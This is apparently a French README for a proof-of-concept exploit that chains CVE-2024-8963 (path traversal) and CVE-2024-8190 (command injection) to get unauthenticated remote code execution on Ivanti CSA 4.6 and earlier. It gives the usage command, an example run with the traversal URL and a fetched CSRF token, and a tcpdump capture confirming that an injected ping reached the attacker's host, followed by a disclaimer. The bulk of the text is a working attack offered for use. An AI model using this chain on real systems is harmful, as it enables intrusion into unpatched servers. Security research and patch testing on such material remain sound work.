
Combinaison de CVE-2024-8963 & CVE-2024-8190 - Pour un RCE non authentifié sur Ivanti CSA 4.6 et versions antérieures
Combinaison de CVE-2024-8963 & CVE-2024-8190 - Preuve de concept (PoC) pour une exécution de code à distance non authentifiée sur Ivanti CSA 4.6 et versions inférieures.
CVE-2024-8963
Traversée de chemin dans Ivanti CSA avant la version 4.6 Patch 519 permet à un attaquant distant non authentifié d'accéder à des fonctionnalités restreintes.
CVE-2024-8190
Une vulnérabilité d'injection de commandes OS dans Ivanti Cloud Services Appliance versions 4.6 Patch 518 et antérieures permet à un attaquant distant authentifié d'obtenir une exécution de code à distance. L'attaquant doit disposer de privilèges de niveau administrateur pour exploiter cette vulnérabilité.
Ce PoC combine les deux pour démontrer comment CVE-2024-8190 peut être utilisé sans authentification.
python3 ./cve-2024-8190.py <target_url> '<CMD>'
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
PoC CVE-2024-8190 d'Horizon3.ai sur lequel celui-ci est fortement basé :
https://github.com/horizon3ai/CVE-2024-8190
Le modèle nuclei de ProjectDiscovery pour CVE-2024-8963.yaml :
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml
P.S. ProjectDiscovery déchire !
Ne soyez pas un imbécile.
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.